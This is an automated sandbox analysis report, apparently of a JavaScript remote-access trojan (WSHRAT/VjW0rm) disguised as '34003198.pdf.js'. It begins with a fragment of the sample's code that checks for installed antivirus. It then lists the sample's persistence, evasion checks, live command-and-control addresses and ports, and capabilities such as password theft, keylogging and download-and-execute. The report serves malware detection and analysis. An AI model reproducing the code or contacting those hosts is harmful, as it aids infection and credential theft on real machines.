{var it = en.item();return it.Caption;break;}}if (N == 4) {var wmg = "winmgmts:\\\\localhost\\root\\securitycenter";s = GetObject(wmg).InstancesOf(y[3]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();var str = it.DisplayName;}if (str !== '') {wmg = wmg + "2";s = GetObject(wmg).InstancesOf(y[3]);en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {it = en.item();return it.DisplayName;}} else {return it.DisplayName;}}if (N==6) {s = GetObject(y[0]).InstancesOf(y[1]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();

Boot Survival

Creates autostart registry keys with suspicious names

Source: C:\Windows\System32\wscript.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 34003198

Jump to behavior

Drops script or batch files to the startup folder

Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js			Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bCdHGOcGLp.js			Jump to dropped file

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bCdHGOcGLp.js	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA

Source: C:\Windows\System32\wscript.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 34003198			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 34003198			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: pdf.js

Static PE information: 34003198.pdf.js

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 5401
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 5401
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 5401
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 5401
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 5401
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 1604

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: wscript.exe, 00000002.00000003.1895073011.0000020BE1D2B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1D2B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895272913.0000020BE1D2C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW/b
Source: wscript.exe, 00000002.00000003.1894927688.0000020BE1CC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1CC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895073011.0000020BE1D2B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1D2B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895136067.0000020BE1CCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895272913.0000020BE1D2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2074574369.00000221C11D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000006.00000003.2074574369.00000221C11D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWG
Source: wscript.exe, 00000006.00000003.2074574369.00000221C107D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW.
Source: wscript.exe, 00000006.00000003.2074574369.00000221C107D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RA

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe	Network Connect: 94.156.71.108 1604
Source: C:\Windows\System32\wscript.exe	Network Connect: 109.248.151.106 5401			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct

Stealing of Sensitive Information

Yara detected VjW0rm

Source: Yara match	File source: amsi64_2316.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_3084.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_5428.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_5228.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_6540.amsi.csv, type: OTHER

Yara detected WSHRAT

Source: Yara match	File source: amsi64_4108.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_3168.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_3052.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_2108.amsi.csv, type: OTHER
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000000.00000003.1717094086.00000204EDD11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2052217166.000001B0667E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1732635440.00000204E96D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1895477782.0000020BE1A81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1732046092.00000204E96D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2044832701.000001B066B5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1946740186.00000221C1074000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1948124676.00000221C10C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1756338470.0000020BE1DFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1716943117.00000204EE000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1939972889.00000221C11A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1895073011.0000020BE1D16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1894450811.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1717820374.00000204ED0E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1733013257.00000204E96D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1961308985.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1707066216.00000204EDF11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1734499646.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2051877056.000001B066C4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1939694643.00000221C0FD1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2074574369.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2053586111.000001B065B93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1716028940.00000204EE000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2051515691.000001B066DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1733327075.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1734834487.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2052217166.000001B066887000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1894927688.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1707419041.00000204EDF11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1899732633.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1716743000.00000204EE31A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1707269284.00000204EE0E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 4108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 3168, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 3052, type: MEMORYSTR

Remote Access Functionality

Detected WSHRat

Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string up-n-exec
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string get-pass
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string down-n-exec
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string keylogger
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string take-log
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string up-n-exec
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string get-pass
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string down-n-exec
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string keylogger
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string take-log
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string up-n-exec
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string get-pass
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string down-n-exec
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string keylogger
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string take-log
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string up-n-exec
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string get-pass
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string down-n-exec
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string keylogger
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: Suspicious string take-log

Yara detected VjW0rm

Source: Yara match	File source: amsi64_2316.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_3084.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_5428.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_5228.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_6540.amsi.csv, type: OTHER

Yara detected WSHRAT

Source: Yara match	File source: amsi64_4108.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_3168.amsi.csv, type: OTHER
